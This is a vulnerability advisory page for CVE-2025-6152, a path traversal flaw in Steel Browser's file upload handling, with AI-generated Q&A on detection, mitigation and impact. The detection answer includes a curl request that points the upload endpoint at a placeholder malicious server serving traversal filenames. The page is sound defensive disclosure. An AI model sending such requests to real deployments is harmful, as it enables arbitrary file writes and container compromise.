CVE-2025-6152
BaseFortify
Publication date: 2025-06-17
Last updated on: 2025-07-02
Assigner: VulDB
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| steel | browser | 0.1.1 |
| steel | browser | 0.1.2 |
| steel | browser | 0.1.3 |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-22 | The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory. |
Attack-Flow Graph
AI Powered Q&A
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by monitoring and analyzing file upload requests to the Steel Browser API endpoint, specifically those using the 'fileUrl' parameter. Look for suspicious filenames containing path traversal sequences (e.g., '../') in the Content-Disposition headers of HTTP responses fetched by the server. Additionally, setting up a local HTTP server that responds with malicious Content-Disposition headers and testing the /v1/sessions/{sessionId}/files endpoint with a fileUrl parameter can help reproduce and detect the vulnerability. Commands to inspect logs or capture traffic could include using tools like curl to simulate requests or using network monitoring tools to capture HTTP headers. For example, a curl command to test might be: curl -X POST "http://<steel-browser-host>/v1/sessions/<sessionId>/files?fileUrl=http://malicious-server/file" \ -H "Content-Type: application/json" where the malicious-server returns a Content-Disposition header with a filename containing path traversal payloads. Monitoring file system changes in the container, especially unexpected file creations outside intended directories, can also help detect exploitation attempts. [4]
What immediate steps should I take to mitigate this vulnerability?
The immediate mitigation step is to apply the available patch identified by commit 7ba93a10000fb77ee01731478ef40551a27bd5b9, which fixes the improper sanitization of filenames in the handleFileUpload function. Until the patch is applied, restrict or disable the file upload functionality that uses the 'fileUrl' parameter to prevent exploitation. Additionally, implement input validation and sanitization on filenames extracted from HTTP headers to prevent path traversal. Monitoring and restricting network access to the vulnerable API endpoints and running the application with least privilege can reduce the impact of potential exploitation. [2, 3, 4]
Can you explain this vulnerability to me?
CVE-2025-6152 is a critical path traversal vulnerability in Steel Browser versions up to 0.1.3. It occurs in the handleFileUpload function when processing file uploads using the fileUrl parameter. The vulnerability arises because the filename extracted from the HTTP Content-Disposition header is not properly sanitized. This allows an attacker to supply a filename containing path traversal sequences (e.g., ../../../) that cause the server to write files outside the intended directory, potentially overwriting critical files. The attack can be performed remotely by making specially crafted upload requests, enabling arbitrary file writes within the container filesystem. [1, 2, 4]
How can this vulnerability impact me? :
This vulnerability can impact you by allowing remote attackers to write arbitrary files anywhere in the container's filesystem where Steel Browser is running. This can lead to unauthorized file creation or overwriting of critical files, potentially resulting in remote code execution, container compromise, or disruption of service. The flaw affects confidentiality, integrity, and availability of the system, making it a serious security risk especially in cloud or containerized environments. [1, 2, 4]